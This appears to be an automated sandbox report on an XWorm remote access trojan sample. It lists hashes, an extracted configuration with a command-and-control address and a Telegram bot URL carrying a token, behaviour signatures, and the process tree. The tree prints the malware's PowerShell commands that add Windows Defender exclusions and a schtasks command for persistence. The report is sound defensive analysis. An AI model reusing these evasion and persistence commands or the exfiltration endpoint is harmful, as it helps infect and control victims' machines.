Analysis

  • max time kernel
    146s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20231020-en
  • resource tags

    arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system
  • submitted
    05/11/2023, 16:33

General

  • Target

    NEAS.83a08efeb3b8748e96c787399bbbc5a0_JC.exe

  • Size

    45KB

  • MD5

    83a08efeb3b8748e96c787399bbbc5a0

  • SHA1

    14455741a4484a39fb55fd952e8782e942c9526b

  • SHA256

    62fe5b9ab37bbb61c425200e3990bf29ea5de6796f2bfdfbb043450c8957798b

  • SHA512

    8044db9aa272fbec73e0d2a58cc6d3a40c6d1159281a79ec24b2e67934af1bd6d110e8f08aa59375cbe3132d0938747d5bb281896aecac93a37b3a53e641e4cb

  • SSDEEP

    768:ogO5RiCQqFx9spM0Qp8A7tfZjG0LgLF+79cOr6MOChUbWLH+:BO5RfQk9sptQp8Ava0eFI9br6MOCyW6

Malware Config

Extracted

Family

xworm

Version

5.0

C2

188.148.105.135:2112

Mutex

tcC0TAK6pKec3LNj

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Craxs Loader.exe

  • telegram

    https://api.telegram.org/bot6608139717:AAGt-zMdIdgdybfcDCcjI5c40PuzKHpy3kQ/sendMessage?chat_id=6468226445

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\NEAS.83a08efeb3b8748e96c787399bbbc5a0_JC.exe
    "C:\Users\Admin\AppData\Local\Temp\NEAS.83a08efeb3b8748e96c787399bbbc5a0_JC.exe"
    1⤵
    • Drops startup file
    • Adds Run key to start application
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1696
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NEAS.83a08efeb3b8748e96c787399bbbc5a0_JC.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2832
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'NEAS.83a08efeb3b8748e96c787399bbbc5a0_JC.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Craxs Loader.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2660
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Craxs Loader.exe'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2568
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Craxs Loader" /tr "C:\ProgramData\Craxs Loader.exe"
      2⤵
      • Creates scheduled task(s)
      PID:2020
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {A06DE170-EB80-47CD-9726-E3F1222750B6} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]
    1⤵
      PID:2920

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      dd8c1ba9cbf9ab32782f84cf3b525300

      SHA1

      f52d542258ea15174faf6dfff6591911af847164

      SHA256

      0cca36d6fab445c1b43d411b88dc097429422ba2d290022adb8305455f807cb8

      SHA512

      c2daee6cca62533d44906987e287edb346feafe5cc8af3d96a200ddbd3735cceabc3829ddcba27cdea61be0d83473df96dd3b805ae4d651ad26d42f9dce8f44c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      dd8c1ba9cbf9ab32782f84cf3b525300

      SHA1

      f52d542258ea15174faf6dfff6591911af847164

      SHA256

      0cca36d6fab445c1b43d411b88dc097429422ba2d290022adb8305455f807cb8

      SHA512

      c2daee6cca62533d44906987e287edb346feafe5cc8af3d96a200ddbd3735cceabc3829ddcba27cdea61be0d83473df96dd3b805ae4d651ad26d42f9dce8f44c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      dd8c1ba9cbf9ab32782f84cf3b525300

      SHA1

      f52d542258ea15174faf6dfff6591911af847164

      SHA256

      0cca36d6fab445c1b43d411b88dc097429422ba2d290022adb8305455f807cb8

      SHA512

      c2daee6cca62533d44906987e287edb346feafe5cc8af3d96a200ddbd3735cceabc3829ddcba27cdea61be0d83473df96dd3b805ae4d651ad26d42f9dce8f44c

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X4VKO4Q9Y3LRJ8V9CO0J.temp

      Filesize

      7KB

      MD5

      dd8c1ba9cbf9ab32782f84cf3b525300

      SHA1

      f52d542258ea15174faf6dfff6591911af847164

      SHA256

      0cca36d6fab445c1b43d411b88dc097429422ba2d290022adb8305455f807cb8

      SHA512

      c2daee6cca62533d44906987e287edb346feafe5cc8af3d96a200ddbd3735cceabc3829ddcba27cdea61be0d83473df96dd3b805ae4d651ad26d42f9dce8f44c

    • memory/1696-1-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/1696-2-0x000000001B2D0000-0x000000001B350000-memory.dmp

      Filesize

      512KB

    • memory/1696-56-0x000000001A990000-0x000000001A99C000-memory.dmp

      Filesize

      48KB

    • memory/1696-11-0x000007FEF57C0000-0x000007FEF61AC000-memory.dmp

      Filesize

      9.9MB

    • memory/1696-0-0x0000000001020000-0x0000000001032000-memory.dmp

      Filesize

      72KB

    • memory/2568-48-0x0000000002C40000-0x0000000002CC0000-memory.dmp

      Filesize

      512KB

    • memory/2568-46-0x0000000002C40000-0x0000000002CC0000-memory.dmp

      Filesize

      512KB

    • memory/2568-45-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2568-44-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2568-47-0x0000000002C40000-0x0000000002CC0000-memory.dmp

      Filesize

      512KB

    • memory/2568-49-0x0000000002C40000-0x0000000002CC0000-memory.dmp

      Filesize

      512KB

    • memory/2568-50-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2608-25-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB

    • memory/2608-22-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2608-26-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2608-23-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB

    • memory/2608-19-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

      Filesize

      2.9MB

    • memory/2608-24-0x0000000002940000-0x00000000029C0000-memory.dmp

      Filesize

      512KB

    • memory/2608-21-0x00000000022A0000-0x00000000022A8000-memory.dmp

      Filesize

      32KB

    • memory/2608-20-0x000007FEEE0B0000-0x000007FEEEA4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-33-0x000007FEEEA50000-0x000007FEEF3ED000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-37-0x000007FEEEA50000-0x000007FEEF3ED000-memory.dmp

      Filesize

      9.6MB

    • memory/2660-36-0x0000000002370000-0x00000000023F0000-memory.dmp

      Filesize

      512KB

    • memory/2660-35-0x0000000002370000-0x00000000023F0000-memory.dmp

      Filesize

      512KB

    • memory/2660-34-0x0000000002370000-0x00000000023F0000-memory.dmp

      Filesize

      512KB

    • memory/2660-32-0x000007FEEEA50000-0x000007FEEF3ED000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-13-0x000007FEEEA50000-0x000007FEEF3ED000-memory.dmp

      Filesize

      9.6MB

    • memory/2832-12-0x0000000001EF0000-0x0000000001F70000-memory.dmp

      Filesize

      512KB

    • memory/2832-9-0x0000000001EF0000-0x0000000001F70000-memory.dmp

      Filesize

      512KB

    • memory/2832-10-0x0000000002310000-0x0000000002318000-memory.dmp

      Filesize

      32KB

    • memory/2832-8-0x000000001B150000-0x000000001B432000-memory.dmp

      Filesize

      2.9MB

    • memory/2832-7-0x000007FEEEA50000-0x000007FEEF3ED000-memory.dmp

      Filesize

      9.6MB